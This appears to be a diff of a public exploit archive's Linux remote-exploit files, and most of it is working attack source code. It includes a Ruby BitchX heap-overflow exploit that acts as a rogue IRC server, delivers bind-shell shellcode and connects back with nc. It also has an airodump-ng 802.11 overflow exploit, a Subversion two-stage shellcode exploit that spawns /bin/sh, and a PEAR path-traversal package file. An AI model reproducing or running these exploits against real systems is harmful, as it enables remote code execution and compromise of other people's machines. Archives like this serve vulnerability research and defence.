@ -38,6 +38,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) {
$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012"; $exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";
system("(echo -e \"$exploit_string\" ; cat) | nc $target 143"); system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");
# milw0rm.com [2001-01-19] # milw0rm.com [2001-01-19]

6
platforms/linux/remote/284.c
View file

@ -236,6 +236,6 @@ int main(int argc, char **argv) {
close(sock); close(sock);
return 0; return 0;
} }
// milw0rm.com [2001-03-03] // milw0rm.com [2001-03-03]

6
platforms/linux/remote/29734.txt
View file

@ -91,6 +91,6 @@ Ruben Garrote Garc
rubengarrote [at] gmail [dot] com rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com http://boken00.blogspot.com
EDB Note: ## EDB Note:
It seems 3.70 version has been patched against this. # It seems 3.70 version currently available for download
Later versions are probably vulnerable to this. # has been patched against this. Earlier versions are probably vulnerable to this.

14
platforms/linux/remote/30018.py Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23887/info
Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.
Exploiting this issue allows remote attackers to read portions of memory.
Python 2.4.4-2 and 2.5 are confirmed vulnerable.
#!/usr/bin/python
import locale
print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))

9
platforms/linux/remote/30043.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

70
platforms/linux/remote/30074.txt Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/24111/info
PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files.
An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations.
This issue affects PEAR 1.0 to 1.5.3.
create a file named "INSTALL" and save it in the current directory.
Save the following XML as package.xml, and run "pear install package.xml"
If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into
/usr/local/test.php
<?xml version="1.0" encoding="UTF-8"?>
<package version="2.0" xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Test_Sec</name>
<channel>pear.php.net</channel>
<summary>Test security vulnerability</summary>
<description>demonstrate install-as vulnerability
</description>
<lead>
<name>Greg Beaver</name>
<user>cellog</user>
<email>cellog@php.net</email>
<active>yes</active>
</lead>
<date>2007-03-05</date>
<version>
<release>1.6.0</release>
<api>1.6.0</api>
</version>
<stability>
<release>stable</release>
<api>stable</api>
</stability>
<license uri="http://www.php.net/license">PHP License</license>
<notes>
allow up to latest beta version [tias]
</notes>
<contents>
<dir name="/">
<file name="INSTALL" role="php" />
</dir> <!-- / -->
</contents>
<dependencies>
<required>
<php>
<min>4.3.0</min>
</php>
<pearinstaller>
<min>1.4.3</min>
</pearinstaller>
</required>
</dependencies>
<phprelease>
<filelist>
<install as="../../test.php" name="INSTALL" />
</filelist>
</phprelease>
</package>

9
platforms/linux/remote/30089.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24161/info
Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects Ruby on Rails 1.2.3; other versions may also be affected.
http://www.exploit-db.com/sploits/30089.tgz

372
platforms/linux/remote/3724.c
View file

@ -1,186 +1,186 @@
/** /**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
* *
* Proof of concept exploit for a stack (and heap) based * Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited * overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to * by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range * execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng. * that are sniffing with a vulnerable version of airodump-ng.
* *
* This exploit requires the lorcon 802.11 packet injection * This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details. * library, see http://802.11ninja.net for details.
* *
* Compiling: * Compiling:
* *
* gcc -o airodump-remote airodump-remote.c -lorcon * gcc -o airodump-remote airodump-remote.c -lorcon
* *
* Usage: * Usage:
* *
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr] * ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
* *
* Drivers supported by lorcon: * Drivers supported by lorcon:
* *
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
* *
* Header types: * Header types:
* *
* 0 - None (not tested) * 0 - None (not tested)
* 1 - Fake prism54 header * 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested) * 2 - Fake radiotap header (not tested)
* *
* Return addresses: * Return addresses:
* *
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
* *
* Example usage: * Example usage:
* *
* ./airodump-ng wlan0 prism54 11 1 0x8054934 * ./airodump-ng wlan0 prism54 11 1 0x8054934
* *
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ] * Author: Jonathan So [ jonny [ @ ] nop-art.net ]
* *
* Copyright (C) 2007 Jonathan So * Copyright (C) 2007 Jonathan So
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <tx80211.h> #include <tx80211.h>
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work // Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes. // here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message char shellcode[] = "\xeb\x14" // jmp get_message
// start: // start:
"\x59\x31\xdb\x31\xd2\xb2" "\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length "\x1b" // message length
"\x31\xc0\x88\x04\x11" "\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write "\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit "\xb0\x01\xcd\x80" // sys_exit
// get_message: // get_message:
"\xe8\xe7\xff\xff\xff" // call start "\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text "Stop sniffing our network!!"; // message text
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
tx80211_t tx; tx80211_t tx;
tx80211_packet_t txp; tx80211_packet_t txp;
uint8_t packet[1044]; uint8_t packet[1044];
uint8_t *ppacket; uint8_t *ppacket;
int headertype; int headertype;
unsigned ret_addr = 0x8054934; unsigned ret_addr = 0x8054934;
FILE *fp; FILE *fp;
if(argc<5) { if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype> printf("usage: %s <interface> <driver> <channel> <arptype>
[ret_addr]\n", argv[0]); [ret_addr]\n", argv[0]);
exit(1); exit(1);
} }
if(argc>5) { if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16); ret_addr = strtoul(argv[5], NULL, 16);
} }
headertype = atoi(argv[4]); headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) { TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver"); fprintf(stderr, "Error initializing driver");
return 1; return 1;
} }
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) { TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n"); fprintf(stderr, "Error setting inject mode\n");
return 1; return 1;
} }
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n"); fprintf(stderr, "Error setting channel\n");
} }
if (tx80211_open(&tx) < 0) { if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n"); fprintf(stderr, "Unable to open interface\n");
return 1; return 1;
} }
txp.packet = packet; txp.packet = packet;
// Fill packet with nops // Fill packet with nops
memset(packet, 0x90, sizeof(packet)); memset(packet, 0x90, sizeof(packet));
switch (headertype) { switch (headertype) {
case 0: case 0:
// No arptype, just send raw packet // No arptype, just send raw packet
ppacket = packet; ppacket = packet;
break; break;
case 1: case 1:
// Send fake prism header // Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4); memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8; ppacket = packet + 8;
break; break;
case 2: case 2:
// Send fake radiotap header // Send fake radiotap header
packet[0] = 0; packet[0] = 0;
packet[2] = 3; packet[2] = 3;
ppacket = packet + 3; ppacket = packet + 3;
break; break;
default: default:
printf("Invalid header type. Valid options are:\n"); printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n"); printf(" 0 - none\n");
printf(" 1 - prism54\n"); printf(" 1 - prism54\n");
printf(" 2 - radiotap\n"); printf(" 2 - radiotap\n");
return 1; return 1;
} }
// set some necessary 802.11 header fields // set some necessary 802.11 header fields
ppacket[0] = 0xB0; ppacket[0] = 0xB0;
ppacket[1] = 0; ppacket[1] = 0;
ppacket[24] = 1; ppacket[24] = 1;
ppacket[25] = 0; ppacket[25] = 0;
ppacket[26] = 2; ppacket[26] = 2;
ppacket[27] = 0; ppacket[27] = 0;
txp.plen = 512 + (ppacket - packet); txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n"); fprintf(stderr, "Error sending packet 1\n");
return 1; return 1;
} }
ppacket[26] = 4; ppacket[26] = 4;
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n"); fprintf(stderr, "Error sending packet 2\n");
return 1; return 1;
} }
// Insert shellcode at end of nopsled // Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
// Overwrite some char*, needs to be a valid address // Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4); memcpy(ppacket+1028, &ret_addr, 4);
// Overwrite global variable sk_len, used as argument to memcpy // Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4); memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
// Return address // Return address
memcpy(ppacket+820, &ret_addr, 4); memcpy(ppacket+820, &ret_addr, 4);
ppacket[1] = 0x40; ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet); txp.plen = 1036 + + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) { if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n"); fprintf(stderr, "Error sending packet 3\n");
return 1; return 1;
} }
tx80211_close(&tx); tx80211_close(&tx);
return 0; return 0;
} }
// milw0rm.com [2007-04-12] // milw0rm.com [2007-04-12]

6
platforms/linux/remote/413.c
View file

@ -180,6 +180,6 @@ close(sock);
return 0; } return 0; }
return 0; } return 0; }
// milw0rm.com [2004-08-24] // milw0rm.com [2004-08-24]

246
platforms/linux/remote/4321.rb
View file

@ -1,123 +1,123 @@
#!/usr/bin/env ruby #!/usr/bin/env ruby
###################################################### ######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day] # BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit # By bannedit
# Discovered May 16th 2007 # Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT # - Yet another overflow which can overwrite GOT
# #
# I found this vuln after modifying ilja's ircfuzz # I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to # code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the # overwrite the GOT with the ret address to the
# shellcode. # shellcode.
# #
# The actually vulnerability appears to be a stack # The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions # overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can # the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we # only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap # overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT. # data. This allows us to overwrite the GOT.
# #
# Reliability of this exploit in its current stage is # Reliability of this exploit in its current stage is
# limited. There appears to be several factors which # limited. There appears to be several factors which
# restrict the reliability. # restrict the reliability.
####################################################### #######################################################
require 'socket' require 'socket'
#the linux 2.6 target most effective atm #the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' } '0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit shellcode = #fork before binding a shell provides a clean exit
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+ "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+
#metasploit linux x86 shellcode bind tcp port 4444 #metasploit linux x86 shellcode bind tcp port 4444
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+ "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
"\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+ "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
"\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+ "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
"\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+ "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
"\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+ "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
"\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+ "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
"\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38" "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
port = (ARGV[0] || 6667).to_i port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port) sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex) ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------" puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -" puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -" puts "- By bannedit -"
puts "----------------------------------------------" puts "----------------------------------------------"
puts "\n[-] listening for incoming clients..." puts "\n[-] listening for incoming clients..."
while (client = sock.accept) while (client = sock.accept)
ip = client.peeraddr ip = client.peeraddr
buffer = client.gets buffer = client.gets
puts "[<] #{buffer}" puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13 hostname = ([ret].pack('V')) * 13
nick = "bannedit" nick = "bannedit"
#Fake server reply to connection #Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iw\r\n"+ buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
":0 001 #{nick} :biznitch-1.0\r\n"+ ":0 001 #{nick} :biznitch-1.0\r\n"+
":5 002 #{nick} :biznitch-1.0\r\n"+ ":5 002 #{nick} :biznitch-1.0\r\n"+
":6 003 #{nick} :a\r\n"+ ":6 003 #{nick} :a\r\n"+
":aaa 004 #{nick} :a\r\n"+ ":aaa 004 #{nick} :a\r\n"+
":aaa 005 #{nick} :a\r\n"+ ":aaa 005 #{nick} :a\r\n"+
":aaa 251 #{nick} :a\r\n"+ ":aaa 251 #{nick} :a\r\n"+
":aaa 252 #{nick} :a\r\n"+ ":aaa 252 #{nick} :a\r\n"+
":aaa 253 #{nick} :a\r\n"+ ":aaa 253 #{nick} :a\r\n"+
":aaa 254 #{nick} :a\r\n"+ ":aaa 254 #{nick} :a\r\n"+
":aaa 255 #{nick} :a\r\n"+ ":aaa 255 #{nick} :a\r\n"+
":aaa 375 #{nick} :a\r\n"+ ":aaa 375 #{nick} :a\r\n"+
":aaa 372 #{nick} :a\r\n"+ ":aaa 372 #{nick} :a\r\n"+
":aaa 376 #{nick} :a\r\n" ":aaa 376 #{nick} :a\r\n"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+ join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n" ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"
puts "[>] sending fake server response" puts "[>] sending fake server response"
client.send(buffer, 0) client.send(buffer, 0)
sleep(2) sleep(2)
# client.send(join, 0) # client.send(join, 0)
topic = ":aaa TOPIC #hackers:" topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200 ret = ret + 0x200
topic<< ([ret].pack('V')) * 100 topic<< ([ret].pack('V')) * 100
topic<< "\r\n" topic<< "\r\n"
for i in 0..20 for i in 0..20
client.send(topic, 0) client.send(topic, 0)
end end
puts "[>] sending evil buffer" puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE " evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa" evilbuf<< "#{nick} :aaa"
ret = ret + 0x200 ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200 evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "\x90" * (1126 - shellcode.length) evilbuf<< "\x90" * (1126 - shellcode.length)
evilbuf<< shellcode evilbuf<< shellcode
evilbuf<< "\x90" * 40 evilbuf<< "\x90" * 40
evilbuf<< "\r\n" evilbuf<< "\r\n"
for i in 0..5 for i in 0..5
client.send(evilbuf, 0) client.send(evilbuf, 0)
end end
sleep(10) #wait for the shellcode to do its thing... sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open" puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n" puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"
fork { fork {
system("nc #{ip[3]} 4444") system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener" puts "[+] exiting shell dropping back to listener"
} }
end end
# milw0rm.com [2007-08-27] # milw0rm.com [2007-08-27]

656
platforms/linux/remote/4537.c
View file

@ -1,328 +1,328 @@
/***************************************************************** /*****************************************************************
* hoagie_subversion.c * hoagie_subversion.c
* *
* Remote exploit against Subversion-Servers. * Remote exploit against Subversion-Servers.
* *
* Author: greuff <greuff@void.at> * Author: greuff <greuff@void.at>
* *
* Tested on Subversion 1.0.0 and 0.37 * Tested on Subversion 1.0.0 and 0.37
* *
* Algorithm: * Algorithm:
* This is a two-stage exploit. The first stage overflows a buffer * This is a two-stage exploit. The first stage overflows a buffer
* on the stack and leaves us ~60 bytes of machine code to be * on the stack and leaves us ~60 bytes of machine code to be
* executed. We try to find the socket-fd there and then do a * executed. We try to find the socket-fd there and then do a
* read(2) on the socket. The exploit then sends the second stage * read(2) on the socket. The exploit then sends the second stage
* loader to the server, which can be of any length (up to the * loader to the server, which can be of any length (up to the
* obvious limits, of course). This second stage loader spawns * obvious limits, of course). This second stage loader spawns
* /bin/sh on the server and connects it to the socket-fd. * /bin/sh on the server and connects it to the socket-fd.
* *
* Credits: * Credits:
* void.at * void.at
* *
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT. * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM. * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
* *
*****************************************************************/ *****************************************************************/
#include <sys/socket.h> #include <sys/socket.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/time.h> #include <sys/time.h>
#include <unistd.h> #include <unistd.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <stdio.h> #include <stdio.h>
#include <errno.h> #include <errno.h>
#include <string.h> #include <string.h>
#include <fcntl.h> #include <fcntl.h>
#include <netdb.h> #include <netdb.h>
enum protocol { SVN, SVNSSH, HTTP, HTTPS }; enum protocol { SVN, SVNSSH, HTTP, HTTPS };
char stage1loader[]= char stage1loader[]=
// begin socket fd search // begin socket fd search
"\x31\xdb" // xor %ebx, %ebx "\x31\xdb" // xor %ebx, %ebx
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x53" // push %ebx "\x53" // push %ebx
"\x58" // pop %eax "\x58" // pop %eax
"\x50" // push %eax "\x50" // push %eax
"\x5f" // pop %edi # %eax = %ebx = %edi = 0 "\x5f" // pop %edi # %eax = %ebx = %edi = 0
"\x2c\x40" // sub $0x40, %al "\x2c\x40" // sub $0x40, %al
"\x50" // push %eax "\x50" // push %eax
"\x5b" // pop %ebx "\x5b" // pop %ebx
"\x50" // push %eax "\x50" // push %eax
"\x5a" // pop %edx # %ebx = %edx = 0xC0 "\x5a" // pop %edx # %ebx = %edx = 0xC0
"\x57" // push %edi "\x57" // push %edi
"\x57" // push %edi # safety-0 "\x57" // push %edi # safety-0
"\x54" // push %esp "\x54" // push %esp
"\x59" // pop %ecx # %ecx = pointer to the buffer "\x59" // pop %ecx # %ecx = pointer to the buffer
"\x4b" // dec %ebx # beginloop: "\x4b" // dec %ebx # beginloop:
"\x57" // push %edi "\x57" // push %edi
"\x58" // pop %eax # clear %eax "\x58" // pop %eax # clear %eax
"\xd6" // salc (UTF-8) "\xd6" // salc (UTF-8)
"\xb0\x60" // movb $0x60, %al "\xb0\x60" // movb $0x60, %al
"\x2c\x44" // sub $0x44, %al # %eax = 0x1C "\x2c\x44" // sub $0x44, %al # %eax = 0x1C
"\xcd\x80" // int $0x80 # fstat(i, &stat) "\xcd\x80" // int $0x80 # fstat(i, &stat)
"\x58" // pop %eax "\x58" // pop %eax
"\x58" // pop %eax "\x58" // pop %eax
"\x50" // push %eax "\x50" // push %eax
"\x50" // push %eax "\x50" // push %eax
"\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set? "\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set?
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x72\xed" // jb beginloop "\x72\xed" // jb beginloop
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) # %ebx now contains the socket fd "\x90" // nop (UTF-8) # %ebx now contains the socket fd
// begin read(2) // begin read(2)
"\x57" // push %edi "\x57" // push %edi
"\x58" // pop %eax # zero %eax "\x58" // pop %eax # zero %eax
"\x40" // inc %eax "\x40" // inc %eax
"\x40" // inc %eax "\x40" // inc %eax
"\x40" // inc %eax # %eax=3 "\x40" // inc %eax # %eax=3
//"\x54" // push %esp //"\x54" // push %esp
//"\x59" // pop %ecx # %ecx ... address of buffer //"\x59" // pop %ecx # %ecx ... address of buffer
//"\x54" // push %edi //"\x54" // push %edi
//"\x5a" // pop %edx # %edx ... bufferlen (0xC0) //"\x5a" // pop %edx # %edx ... bufferlen (0xC0)
"\xcd\x80" // int $0x80 # read(2) second stage loader "\xcd\x80" // int $0x80 # read(2) second stage loader
"\x39\xc7" // cmp %eax, %edi "\x39\xc7" // cmp %eax, %edi
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x7f\xf3" // jg startover "\x7f\xf3" // jg startover
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\x54" // push %esp "\x54" // push %esp
"\xc3" // ret # execute second stage loader "\xc3" // ret # execute second stage loader
"\x90" // nop (UTF-8) "\x90" // nop (UTF-8)
"\0" // %ebx still contains the fd we can use in the 2nd stage loader. "\0" // %ebx still contains the fd we can use in the 2nd stage loader.
; ;
char stage2loader[]= char stage2loader[]=
// dup2 - %ebx contains the fd // dup2 - %ebx contains the fd
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x00\x00\x00\x00" // mov $0x0, %ecx "\xb9\x00\x00\x00\x00" // mov $0x0, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x01\x00\x00\x00" // mov $0x1, %ecx "\xb9\x01\x00\x00\x00" // mov $0x1, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax "\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x02\x00\x00\x00" // mov $0x2, %ecx "\xb9\x02\x00\x00\x00" // mov $0x2, %ecx
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
// start /bin/sh // start /bin/sh
"\x31\xd2" // xor %edx, %edx "\x31\xd2" // xor %edx, %edx
"\x52" // push %edx "\x52" // push %edx
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e "\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f "\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x89\xe3" // mov %esp, %ebx "\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx "\x52" // push %edx
"\x53" // push %ebx "\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx "\x89\xe1" // mov %esp, %ecx
"\xb8\x0b\x00\x00\x00" // mov $0xb, %eax "\xb8\x0b\x00\x00\x00" // mov $0xb, %eax
"\xcd\x80" // int $0x80 "\xcd\x80" // int $0x80
"\xb8\x01\x00\x00\x00" // mov $0x1, %eax "\xb8\x01\x00\x00\x00" // mov $0x1, %eax
"\xcd\x80" // int %0x80 (exit) "\xcd\x80" // int %0x80 (exit)
; ;
int stage2loaderlen=69; int stage2loaderlen=69;
char requestfmt[]= char requestfmt[]=
"REPORT %s HTTP/1.1\n" "REPORT %s HTTP/1.1\n"
"Host: %s\n" "Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n" "User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n" "Content-Length: %d\n"
"Content-Type: text/xml\n" "Content-Type: text/xml\n"
"Connection: close\n\n" "Connection: close\n\n"
"%s\n"; "%s\n";
char xmlreqfmt[]= char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>" "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">" "<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>" "<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>"; "</S:dated-rev-report>";
int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000]) int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{ {
char *ptr; char *ptr;
char bfr[1000]; char bfr[1000];
ptr=strstr(uri,"://"); ptr=strstr(uri,"://");
if(!ptr) return -1; if(!ptr) return -1;
*ptr=0; *ptr=0;
snprintf(bfr,sizeof(bfr),"%s",uri); snprintf(bfr,sizeof(bfr),"%s",uri);
